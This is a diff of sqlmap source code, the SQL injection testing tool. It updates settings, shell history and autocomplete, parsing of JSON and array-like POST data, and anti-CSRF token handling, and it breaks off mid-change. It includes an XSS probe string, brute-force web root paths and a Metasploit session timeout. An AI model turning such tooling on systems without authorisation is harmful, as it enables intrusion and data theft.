# String used for dummy XSS check of a tested parameter value
|
||||||
|
DUMMY_XSS_CHECK_APPENDIX = "<'\">"
|
||||||
|
|
||||||
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
|
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
|
||||||
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
||||||
|
@ -528,7 +546,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
|
||||||
CHECK_ZERO_COLUMNS_THRESHOLD = 10
|
CHECK_ZERO_COLUMNS_THRESHOLD = 10
|
||||||
|
|
||||||
# Boldify all logger messages containing these "patterns"
|
# Boldify all logger messages containing these "patterns"
|
||||||
BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that")
|
BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved")
|
||||||
|
|
||||||
# Generic www root directory names
|
# Generic www root directory names
|
||||||
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
||||||
|
@ -540,7 +558,7 @@ MAX_HELP_OPTION_LENGTH = 18
|
||||||
MAX_CONNECT_RETRIES = 100
|
MAX_CONNECT_RETRIES = 100
|
||||||
|
|
||||||
# Strings for detecting formatting errors
|
# Strings for detecting formatting errors
|
||||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException")
|
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal")
|
||||||
|
|
||||||
# Regular expression used for extracting ASP.NET view state values
|
# Regular expression used for extracting ASP.NET view state values
|
||||||
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
|
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
|
||||||
|
@ -566,6 +584,9 @@ JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+)
|
||||||
# Regular expression used for detecting multipart POST data
|
# Regular expression used for detecting multipart POST data
|
||||||
MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="
|
MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="
|
||||||
|
|
||||||
|
# Regular expression used for detecting Array-like POST data
|
||||||
|
ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\]=.+%s\2\[\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER)
|
||||||
|
|
||||||
# Default POST data content-type
|
# Default POST data content-type
|
||||||
DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8"
|
DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8"
|
||||||
|
|
||||||
|
@ -581,15 +602,27 @@ MIN_BINARY_DISK_DUMP_SIZE = 100
|
||||||
# Regular expression used for extracting form tags
|
# Regular expression used for extracting form tags
|
||||||
FORM_SEARCH_REGEX = r"(?si)<form(?!.+<form).+?</form>"
|
FORM_SEARCH_REGEX = r"(?si)<form(?!.+<form).+?</form>"
|
||||||
|
|
||||||
|
# Maximum number of lines to save in history file
|
||||||
|
MAX_HISTORY_LENGTH = 1000
|
||||||
|
|
||||||
# Minimum field entry length needed for encoded content (hex, base64,...) check
|
# Minimum field entry length needed for encoded content (hex, base64,...) check
|
||||||
MIN_ENCODED_LEN_CHECK = 5
|
MIN_ENCODED_LEN_CHECK = 5
|
||||||
|
|
||||||
# Timeout in seconds in which Metasploit remote session has to be initialized
|
# Timeout in seconds in which Metasploit remote session has to be initialized
|
||||||
METASPLOIT_SESSION_TIMEOUT = 300
|
METASPLOIT_SESSION_TIMEOUT = 300
|
||||||
|
|
||||||
|
# Reference: http://www.postgresql.org/docs/9.0/static/catalog-pg-largeobject.html
|
||||||
|
LOBLKSIZE = 2048
|
||||||
|
|
||||||
|
# Suffix used to mark variables having keyword names
|
||||||
|
EVALCODE_KEYWORD_SUFFIX = "_KEYWORD"
|
||||||
|
|
||||||
# Reference: http://www.cookiecentral.com/faq/#3.5
|
# Reference: http://www.cookiecentral.com/faq/#3.5
|
||||||
NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
|
NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
|
||||||
|
|
||||||
|
# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
|
||||||
|
CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")
|
||||||
|
|
||||||
# Prefixes used in brute force search for web server document root
|
# Prefixes used in brute force search for web server document root
|
||||||
BRUTE_DOC_ROOT_PREFIXES = {
|
BRUTE_DOC_ROOT_PREFIXES = {
|
||||||
OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),
|
OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),
|
||||||
|
@ -605,6 +638,9 @@ BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
|
||||||
# Character used as a boundary in kb.chars (preferably less frequent letter)
|
# Character used as a boundary in kb.chars (preferably less frequent letter)
|
||||||
KB_CHARS_BOUNDARY_CHAR = 'q'
|
KB_CHARS_BOUNDARY_CHAR = 'q'
|
||||||
|
|
||||||
|
# Letters of lower frequency used in kb.chars
|
||||||
|
KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp"
|
||||||
|
|
||||||
# CSS style used in HTML dump format
|
# CSS style used in HTML dump format
|
||||||
HTML_DUMP_CSS_STYLE = """<style>
|
HTML_DUMP_CSS_STYLE = """<style>
|
||||||
table{
|
table{
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -13,14 +13,60 @@ from lib.core import readlineng as readline
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
|
from lib.core.enums import AUTOCOMPLETE_TYPE
|
||||||
from lib.core.enums import OS
|
from lib.core.enums import OS
|
||||||
|
from lib.core.settings import MAX_HISTORY_LENGTH
|
||||||
|
|
||||||
def saveHistory():
|
def readlineAvailable():
|
||||||
historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
|
"""
|
||||||
|
Check if the readline is available. By default
|
||||||
|
it is not in Python default installation on Windows
|
||||||
|
"""
|
||||||
|
|
||||||
|
return readline._readline is not None
|
||||||
|
|
||||||
|
def clearHistory():
|
||||||
|
if not readlineAvailable():
|
||||||
|
return
|
||||||
|
|
||||||
|
readline.clear_history()
|
||||||
|
|
||||||
|
def saveHistory(completion=None):
|
||||||
|
if not readlineAvailable():
|
||||||
|
return
|
||||||
|
|
||||||
|
if completion == AUTOCOMPLETE_TYPE.SQL:
|
||||||
|
historyPath = paths.SQL_SHELL_HISTORY
|
||||||
|
elif completion == AUTOCOMPLETE_TYPE.OS:
|
||||||
|
historyPath = paths.OS_SHELL_HISTORY
|
||||||
|
else:
|
||||||
|
historyPath = paths.SQLMAP_SHELL_HISTORY
|
||||||
|
|
||||||
|
try:
|
||||||
|
with open(historyPath, "w+"):
|
||||||
|
pass
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
readline.set_history_length(MAX_HISTORY_LENGTH)
|
||||||
|
try:
|
||||||
readline.write_history_file(historyPath)
|
readline.write_history_file(historyPath)
|
||||||
|
except IOError, msg:
|
||||||
|
warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg)
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
def loadHistory():
|
def loadHistory(completion=None):
|
||||||
historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
|
if not readlineAvailable():
|
||||||
|
return
|
||||||
|
|
||||||
|
clearHistory()
|
||||||
|
|
||||||
|
if completion == AUTOCOMPLETE_TYPE.SQL:
|
||||||
|
historyPath = paths.SQL_SHELL_HISTORY
|
||||||
|
elif completion == AUTOCOMPLETE_TYPE.OS:
|
||||||
|
historyPath = paths.OS_SHELL_HISTORY
|
||||||
|
else:
|
||||||
|
historyPath = paths.SQLMAP_SHELL_HISTORY
|
||||||
|
|
||||||
if os.path.exists(historyPath):
|
if os.path.exists(historyPath):
|
||||||
try:
|
try:
|
||||||
|
@ -47,14 +93,12 @@ class CompleterNG(rlcompleter.Completer):
|
||||||
|
|
||||||
return matches
|
return matches
|
||||||
|
|
||||||
def autoCompletion(sqlShell=False, osShell=False):
|
def autoCompletion(completion=None, os=None, commands=None):
|
||||||
# First of all we check if the readline is available, by default
|
if not readlineAvailable():
|
||||||
# it is not in Python default installation on Windows
|
|
||||||
if not readline._readline:
|
|
||||||
return
|
return
|
||||||
|
|
||||||
if osShell:
|
if completion == AUTOCOMPLETE_TYPE.OS:
|
||||||
if Backend.isOs(OS.WINDOWS):
|
if os == OS.WINDOWS:
|
||||||
# Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
|
# Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
|
||||||
completer = CompleterNG({
|
completer = CompleterNG({
|
||||||
"copy": None, "del": None, "dir": None,
|
"copy": None, "del": None, "dir": None,
|
||||||
|
@ -75,5 +119,11 @@ def autoCompletion(sqlShell=False, osShell=False):
|
||||||
readline.set_completer(completer.complete)
|
readline.set_completer(completer.complete)
|
||||||
readline.parse_and_bind("tab: complete")
|
readline.parse_and_bind("tab: complete")
|
||||||
|
|
||||||
loadHistory()
|
elif commands:
|
||||||
atexit.register(saveHistory)
|
completer = CompleterNG(dict(((_, None) for _ in commands)))
|
||||||
|
readline.set_completer_delims(' ')
|
||||||
|
readline.set_completer(completer.complete)
|
||||||
|
readline.parse_and_bind("tab: complete")
|
||||||
|
|
||||||
|
loadHistory(completion)
|
||||||
|
atexit.register(saveHistory, completion)
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -17,6 +17,8 @@ from lib.core.common import Backend
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
from lib.core.common import hashDBRetrieve
|
from lib.core.common import hashDBRetrieve
|
||||||
from lib.core.common import intersect
|
from lib.core.common import intersect
|
||||||
|
from lib.core.common import normalizeUnicode
|
||||||
|
from lib.core.common import openFile
|
||||||
from lib.core.common import paramToDict
|
from lib.core.common import paramToDict
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.common import resetCookieJar
|
from lib.core.common import resetCookieJar
|
||||||
|
@ -38,13 +40,17 @@ from lib.core.exception import SqlmapFilePathException
|
||||||
from lib.core.exception import SqlmapGenericException
|
from lib.core.exception import SqlmapGenericException
|
||||||
from lib.core.exception import SqlmapMissingPrivileges
|
from lib.core.exception import SqlmapMissingPrivileges
|
||||||
from lib.core.exception import SqlmapSyntaxException
|
from lib.core.exception import SqlmapSyntaxException
|
||||||
|
from lib.core.exception import SqlmapSystemException
|
||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
from lib.core.option import _setDBMS
|
from lib.core.option import _setDBMS
|
||||||
from lib.core.option import _setKnowledgeBaseAttributes
|
from lib.core.option import _setKnowledgeBaseAttributes
|
||||||
from lib.core.option import _setAuthCred
|
from lib.core.option import _setAuthCred
|
||||||
from lib.core.settings import ASTERISK_MARKER
|
from lib.core.settings import ASTERISK_MARKER
|
||||||
|
from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
|
||||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||||
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
from lib.core.settings import HOST_ALIASES
|
from lib.core.settings import HOST_ALIASES
|
||||||
|
from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
|
||||||
from lib.core.settings import JSON_RECOGNITION_REGEX
|
from lib.core.settings import JSON_RECOGNITION_REGEX
|
||||||
from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX
|
from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX
|
||||||
from lib.core.settings import MULTIPART_RECOGNITION_REGEX
|
from lib.core.settings import MULTIPART_RECOGNITION_REGEX
|
||||||
|
@ -91,6 +97,7 @@ def _setRequestParams():
|
||||||
|
|
||||||
if conf.data is not None:
|
if conf.data is not None:
|
||||||
conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method
|
conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method
|
||||||
|
hintNames = []
|
||||||
|
|
||||||
def process(match, repl):
|
def process(match, repl):
|
||||||
retVal = match.group(0)
|
retVal = match.group(0)
|
||||||
|
@ -103,7 +110,8 @@ def _setRequestParams():
|
||||||
retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
|
retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
|
||||||
else:
|
else:
|
||||||
break
|
break
|
||||||
|
if CUSTOM_INJECTION_MARK_CHAR in retVal:
|
||||||
|
hintNames.append((retVal.split(CUSTOM_INJECTION_MARK_CHAR)[0], match.group("name")))
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data:
|
if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data:
|
||||||
|
@ -115,6 +123,9 @@ def _setRequestParams():
|
||||||
else:
|
else:
|
||||||
kb.processUserMarks = not test or test[0] not in ("n", "N")
|
kb.processUserMarks = not test or test[0] not in ("n", "N")
|
||||||
|
|
||||||
|
if kb.processUserMarks:
|
||||||
|
kb.testOnlyCustom = True
|
||||||
|
|
||||||
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
||||||
if re.search(JSON_RECOGNITION_REGEX, conf.data):
|
if re.search(JSON_RECOGNITION_REGEX, conf.data):
|
||||||
message = "JSON data found in %s data. " % conf.method
|
message = "JSON data found in %s data. " % conf.method
|
||||||
|
@ -126,6 +137,12 @@ def _setRequestParams():
|
||||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||||
|
match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
|
||||||
|
if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
|
||||||
|
_ = match.group(2)
|
||||||
|
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _)
|
||||||
|
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _)
|
||||||
|
conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
|
||||||
kb.postHint = POST_HINT.JSON
|
kb.postHint = POST_HINT.JSON
|
||||||
|
|
||||||
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
|
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
|
||||||
|
@ -140,6 +157,17 @@ def _setRequestParams():
|
||||||
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||||
kb.postHint = POST_HINT.JSON_LIKE
|
kb.postHint = POST_HINT.JSON_LIKE
|
||||||
|
|
||||||
|
elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
|
||||||
|
message = "Array-like data found in %s data. " % conf.method
|
||||||
|
message += "Do you want to process it? [Y/n/q] "
|
||||||
|
test = readInput(message, default="Y")
|
||||||
|
if test and test[0] in ("q", "Q"):
|
||||||
|
raise SqlmapUserQuitException
|
||||||
|
elif test[0] not in ("n", "N"):
|
||||||
|
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||||
|
conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
|
||||||
|
kb.postHint = POST_HINT.ARRAY_LIKE
|
||||||
|
|
||||||
elif re.search(XML_RECOGNITION_REGEX, conf.data):
|
elif re.search(XML_RECOGNITION_REGEX, conf.data):
|
||||||
message = "SOAP/XML data found in %s data. " % conf.method
|
message = "SOAP/XML data found in %s data. " % conf.method
|
||||||
message += "Do you want to process it? [Y/n/q] "
|
message += "Do you want to process it? [Y/n/q] "
|
||||||
|
@ -152,7 +180,7 @@ def _setRequestParams():
|
||||||
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
|
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
|
||||||
|
|
||||||
elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
|
elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
|
||||||
message = "Multipart like data found in %s data. " % conf.method
|
message = "Multipart-like data found in %s data. " % conf.method
|
||||||
message += "Do you want to process it? [Y/n/q] "
|
message += "Do you want to process it? [Y/n/q] "
|
||||||
test = readInput(message, default="Y")
|
test = readInput(message, default="Y")
|
||||||
if test and test[0] in ("q", "Q"):
|
if test and test[0] in ("q", "Q"):
|
||||||
|
@ -180,7 +208,7 @@ def _setRequestParams():
|
||||||
|
|
||||||
kb.processUserMarks = True if (kb.postHint and CUSTOM_INJECTION_MARK_CHAR in conf.data) else kb.processUserMarks
|
kb.processUserMarks = True if (kb.postHint and CUSTOM_INJECTION_MARK_CHAR in conf.data) else kb.processUserMarks
|
||||||
|
|
||||||
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or ""):
|
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or "") and conf.url.startswith("http"):
|
||||||
warnMsg = "you've provided target URL without any GET "
|
warnMsg = "you've provided target URL without any GET "
|
||||||
warnMsg += "parameters (e.g. www.site.com/article.php?id=1) "
|
warnMsg += "parameters (e.g. www.site.com/article.php?id=1) "
|
||||||
warnMsg += "and without providing any POST parameters "
|
warnMsg += "and without providing any POST parameters "
|
||||||
|
@ -210,6 +238,15 @@ def _setRequestParams():
|
||||||
else:
|
else:
|
||||||
kb.processUserMarks = not test or test[0] not in ("n", "N")
|
kb.processUserMarks = not test or test[0] not in ("n", "N")
|
||||||
|
|
||||||
|
if kb.processUserMarks:
|
||||||
|
kb.testOnlyCustom = True
|
||||||
|
|
||||||
|
if "=%s" % CUSTOM_INJECTION_MARK_CHAR in _:
|
||||||
|
warnMsg = "it seems that you've provided empty parameter value(s) "
|
||||||
|
warnMsg += "for testing. Please, always use only valid parameter values "
|
||||||
|
warnMsg += "so sqlmap could be able to run properly"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
if not kb.processUserMarks:
|
if not kb.processUserMarks:
|
||||||
if place == PLACE.URI:
|
if place == PLACE.URI:
|
||||||
query = urlparse.urlsplit(value).query
|
query = urlparse.urlsplit(value).query
|
||||||
|
@ -245,7 +282,15 @@ def _setRequestParams():
|
||||||
parts = value.split(CUSTOM_INJECTION_MARK_CHAR)
|
parts = value.split(CUSTOM_INJECTION_MARK_CHAR)
|
||||||
|
|
||||||
for i in xrange(len(parts) - 1):
|
for i in xrange(len(parts) - 1):
|
||||||
conf.paramDict[place]["%s#%d%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))
|
name = None
|
||||||
|
if kb.postHint:
|
||||||
|
for ending, _ in hintNames:
|
||||||
|
if parts[i].endswith(ending):
|
||||||
|
name = "%s %s" % (kb.postHint, _)
|
||||||
|
break
|
||||||
|
if name is None:
|
||||||
|
name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)
|
||||||
|
conf.paramDict[place][name] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))
|
||||||
|
|
||||||
if place == PLACE.URI and PLACE.GET in conf.paramDict:
|
if place == PLACE.URI and PLACE.GET in conf.paramDict:
|
||||||
del conf.paramDict[PLACE.GET]
|
del conf.paramDict[PLACE.GET]
|
||||||
|
@ -313,6 +358,22 @@ def _setRequestParams():
|
||||||
errMsg += "within the given request data"
|
errMsg += "within the given request data"
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
|
if conf.csrfToken:
|
||||||
|
if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
|
||||||
|
errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
|
||||||
|
errMsg += "found in provided GET, POST, Cookie or header values"
|
||||||
|
raise SqlmapGenericException(errMsg)
|
||||||
|
else:
|
||||||
|
for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
|
||||||
|
for parameter in conf.paramDict.get(place, {}):
|
||||||
|
if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
|
||||||
|
message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
|
||||||
|
message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
|
||||||
|
test = readInput(message, default="N")
|
||||||
|
if test and test[0] in ("y", "Y"):
|
||||||
|
conf.csrfToken = parameter
|
||||||
|
break
|
||||||
|
|
||||||
def _setHashDB():
|
def _setHashDB():
|
||||||
"""
|
"""
|
||||||
Check and set the HashDB SQLite file for query resume functionality.
|
Check and set the HashDB SQLite file for query resume functionality.
|
||||||
|
@ -448,7 +509,22 @@ def _setResultsFile():
|
||||||
|
|
||||||
if not conf.resultsFP:
|
if not conf.resultsFP:
|
||||||
conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
|
conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
|
||||||
conf.resultsFP = codecs.open(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
|
try:
|
||||||
|
conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
|
||||||
|
except (OSError, IOError), ex:
|
||||||
|
try:
|
||||||
|
warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex))
|
||||||
|
conf.resultsFilename = tempfile.mkstemp(prefix="sqlmapresults-", suffix=".csv")[1]
|
||||||
|
conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
|
||||||
|
warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
except IOError, _:
|
||||||
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
|
errMsg += "that you have sufficient write permissions to "
|
||||||
|
errMsg += "create temporary files and/or directories"
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
conf.resultsFP.writelines("Target URL,Place,Parameter,Techniques%s" % os.linesep)
|
conf.resultsFP.writelines("Target URL,Place,Parameter,Techniques%s" % os.linesep)
|
||||||
|
|
||||||
logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename)
|
logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename)
|
||||||
|
@ -469,7 +545,7 @@ def _createFilesDir():
|
||||||
except OSError, ex:
|
except OSError, ex:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
|
||||||
warnMsg = "unable to create files directory "
|
warnMsg = "unable to create files directory "
|
||||||
warnMsg += "'%s' (%s). " % (conf.filePath, ex)
|
warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex))
|
||||||
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
@ -491,7 +567,7 @@ def _createDumpDir():
|
||||||
except OSError, ex:
|
except OSError, ex:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
|
||||||
warnMsg = "unable to create dump directory "
|
warnMsg = "unable to create dump directory "
|
||||||
warnMsg += "'%s' (%s). " % (conf.dumpPath, ex)
|
warnMsg += "'%s' (%s). " % (conf.dumpPath, getUnicode(ex))
|
||||||
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
@ -516,25 +592,41 @@ def _createTargetDirs():
|
||||||
os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
|
os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
|
||||||
warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
|
warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
except OSError, ex:
|
except (OSError, IOError), ex:
|
||||||
|
try:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
